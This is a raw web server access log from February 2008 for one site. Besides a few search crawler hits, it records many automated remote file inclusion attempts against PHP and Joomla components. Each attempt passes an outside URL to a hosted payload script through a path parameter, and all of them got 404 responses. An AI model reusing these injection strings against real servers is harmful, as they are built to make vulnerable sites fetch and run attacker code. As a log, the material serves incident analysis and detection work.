74.6.8.120 - - [21/Feb/2008:04:28:20 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.8.120 - - [21/Feb/2008:04:28:21 -0800] "GET /bikes/?D=A HTTP/1.0" 200 2168 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
62.168.15.147 - - [21/Feb/2008:04:28:22 -0800] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [21/Feb/2008:04:28:22 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [21/Feb/2008:04:28:23 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.27.10.226 - - [21/Feb/2008:04:28:58 -0800] "GET /about.php?admin.php?include_path=%20admin.phphttp://www.supriatna.name/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
64.27.10.226 - - [21/Feb/2008:04:28:58 -0800] "GET /logs/about.php?admin.php?include_path=%20admin.phphttp://www.supriatna.name/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
216.169.147.177 - - [21/Feb/2008:04:29:05 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
216.169.147.177 - - [21/Feb/2008:04:29:05 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
216.169.147.177 - - [21/Feb/2008:04:29:06 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
216.169.147.177 - - [21/Feb/2008:04:29:06 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
62.168.15.147 - - [21/Feb/2008:04:29:08 -0800] "GET /logs/access_080108.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.255.117.182 - - [21/Feb/2008:04:29:47 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
88.255.117.182 - - [21/Feb/2008:04:29:48 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
88.255.117.182 - - [21/Feb/2008:04:29:48 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
62.168.15.147 - - [21/Feb/2008:04:29:50 -0800] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [21/Feb/2008:04:29:50 -0800] "GET /logs/access_080108.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [21/Feb/2008:04:29:50 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.10.158.86 - - [21/Feb/2008:04:29:50 -0800] "GET //admin/business_inc/saveserver.php?thisdir=http://www.riothost.com/billing/downloads/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [21/Feb/2008:04:29:51 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.255.117.182 - - [21/Feb/2008:04:29:54 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
87.230.10.213 - - [21/Feb/2008:04:30:05 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
87.230.10.213 - - [21/Feb/2008:04:30:05 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
87.230.10.213 - - [21/Feb/2008:04:30:06 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
87.230.10.213 - - [21/Feb/2008:04:30:06 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
62.168.15.147 - - [21/Feb/2008:04:30:06 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [21/Feb/2008:04:30:06 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [21/Feb/2008:04:30:07 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [21/Feb/2008:04:30:13 -0800] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.45.244.210 - - [21/Feb/2008:04:30:35 -0800] "GET /logs/access_071230.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://preciousland.co.uk/templates/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.168.15.147 - - [21/Feb/2008:04:30:37 -0800] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [21/Feb/2008:04:30:37 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.130.198 - - [21/Feb/2008:04:30:37 -0800] "GET /logs/access_080120.log/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.168.15.147 - - [21/Feb/2008:04:30:38 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [21/Feb/2008:04:30:55 -0800] "GET /logs/access_080108.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.123.8.116 - - [21/Feb/2008:04:31:02 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
209.123.8.116 - - [21/Feb/2008:04:31:03 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
209.123.8.116 - - [21/Feb/2008:04:31:04 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
209.123.8.116 - - [21/Feb/2008:04:31:04 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
62.168.15.147 - - [21/Feb/2008:04:31:23 -0800] "GET /logs/access_080108.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [21/Feb/2008:04:31:43 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [21/Feb/2008:04:31:44 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [21/Feb/2008:04:31:44 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [21/Feb/2008:04:31:48 -0800] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
158.38.0.218 - - [21/Feb/2008:04:31:56 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mecad.es/bo?? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
158.38.0.218 - - [21/Feb/2008:04:31:56 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mecad.es/bo?? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
158.38.0.218 - - [21/Feb/2008:04:31:56 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
158.38.0.218 - - [21/Feb/2008:04:31:56 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
67.195.58.177 - - [21/Feb/2008:04:32:42 -0800] "GET /logs/access_071230.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.8.154.215 - - [21/Feb/2008:04:32:49 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
213.8.154.215 - - [21/Feb/2008:04:32:49 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
213.8.154.215 - - [21/Feb/2008:04:32:50 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
213.8.154.215 - - [21/Feb/2008:04:32:50 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
207.7.108.240 - - [21/Feb/2008:04:32:57 -0800] "GET /logs/access_080121.log/index.php?option=com_forum&Itemid=&mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.7.108.240 - - [21/Feb/2008:04:32:57 -0800] "GET /index.php?option=com_forum&Itemid=&mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.7.108.240 - - [21/Feb/2008:04:32:57 -0800] "GET /logs/index.php?option=com_forum&Itemid=&mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.99.250 - - [21/Feb/2008:04:33:33 -0800] "GET /logs/access_080118.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.99.250 - - [21/Feb/2008:04:33:33 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.108.66.169 - - [21/Feb/2008:04:35:07 -0800] "GET /logs/access_080211.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.frankstonhockeyclub.com/templates/rt_versatility_ii_sienna/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.169 - - [21/Feb/2008:04:35:07 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.frankstonhockeyclub.com/templates/rt_versatility_ii_sienna/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.169 - - [21/Feb/2008:04:35:08 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.frankstonhockeyclub.com/templates/rt_versatility_ii_sienna/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.189.208.72 - - [21/Feb/2008:04:35:09 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
218.189.208.72 - - [21/Feb/2008:04:35:09 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
218.189.208.72 - - [21/Feb/2008:04:35:09 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
218.189.208.72 - - [21/Feb/2008:04:35:09 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
89.108.66.169 - - [21/Feb/2008:04:35:15 -0800] "GET /logs/access_080108.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.frankstonhockeyclub.com/templates/rt_versatility_ii_sienna/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.250.95.201 - - [21/Feb/2008:04:35:16 -0800] "GET /config.inc.php?path_escape=http://www.bieneis.com/bieneis.com/_daten/nuke/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.172.48.89 - - [21/Feb/2008:04:35:26 -0800] "GET /logs/access_080120.log/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.19.104 - - [21/Feb/2008:04:35:34 -0800] "GET /logs/access_071112.log HTTP/1.0" 200 46565 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
202.123.27.136 - - [21/Feb/2008:04:36:19 -0800] "GET /logs/access_080131.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.115.110.146 - - [21/Feb/2008:04:36:22 -0800] "GET /modules.php?name=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
211.115.110.146 - - [21/Feb/2008:04:36:22 -0800] "GET /logs/modules.php?name=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
62.168.15.147 - - [21/Feb/2008:04:36:50 -0800] "GET /logs/access_080106.log/modifyform.html?code=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [21/Feb/2008:04:36:51 -0800] "GET /modifyform.html?code=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [21/Feb/2008:04:36:51 -0800] "GET /logs/modifyform.html?code=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.115 - - [21/Feb/2008:04:36:55 -0800] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://bobatka.info/modules/language/asc/asc/r7????%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.9.78.190 - - [21/Feb/2008:04:37:00 -0800] "GET /logs/access.log/config.inc.php?path_escape=http://www.bieneis.com/bieneis.com/_daten/nuke/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.9.78.190 - - [21/Feb/2008:04:37:00 -0800] "GET /config.inc.php?path_escape=http://www.bieneis.com/bieneis.com/_daten/nuke/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.9.78.190 - - [21/Feb/2008:04:37:00 -0800] "GET /logs/config.inc.php?path_escape=http://www.bieneis.com/bieneis.com/_daten/nuke/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.120.13.92 - - [21/Feb/2008:04:37:14 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://smkk.by.ru/cmdhave.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.168.15.147 - - [21/Feb/2008:04:37:23 -0800] "GET /logs/access_080106.log/modifyform.html?code=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [21/Feb/2008:04:37:23 -0800] "GET /modifyform.html?code=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [21/Feb/2008:04:37:24 -0800] "GET /logs/modifyform.html?code=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [21/Feb/2008:04:37:36 -0800] "GET /logs/access_071224.log/modifyform.html?code=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.233.19.105 - - [21/Feb/2008:04:37:42 -0800] "GET /logs/modules.php?name=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
211.233.19.105 - - [21/Feb/2008:04:37:42 -0800] "GET /modules.php?name=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
62.168.15.147 - - [21/Feb/2008:04:37:54 -0800] "GET /logs/access_071224.log/modifyform.html?code=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.50.208.4 - - [21/Feb/2008:04:38:02 -0800] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.50.208.10 - - [21/Feb/2008:04:38:03 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.50.208.6 - - [21/Feb/2008:04:38:03 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.8.120 - - [21/Feb/2008:04:39:36 -0800] "GET /plans/?S=A HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.154.38.121 - - [21/Feb/2008:04:39:52 -0800] "GET /logs/index.php?pg=http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
80.154.38.121 - - [21/Feb/2008:04:39:52 -0800] "GET /index.php?pg=http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
84.19.182.225 - - [21/Feb/2008:04:39:52 -0800] "GET /logs/access_071202.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.182.225 - - [21/Feb/2008:04:39:53 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.182.225 - - [21/Feb/2008:04:39:53 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.182.225 - - [21/Feb/2008:04:39:53 -0800] "GET /logs/access_080131.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.50.208.3 - - [21/Feb/2008:04:40:41 -0800] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.8.120 - - [21/Feb/2008:04:40:45 -0800] "GET /logs/access_071022.log HTTP/1.0" 200 18527 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.8.120 - - [21/Feb/2008:04:45:04 -0800] "GET /plans/?D=A HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.15.190.12 - - [21/Feb/2008:04:45:10 -0800] "GET /logs/access_071216.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
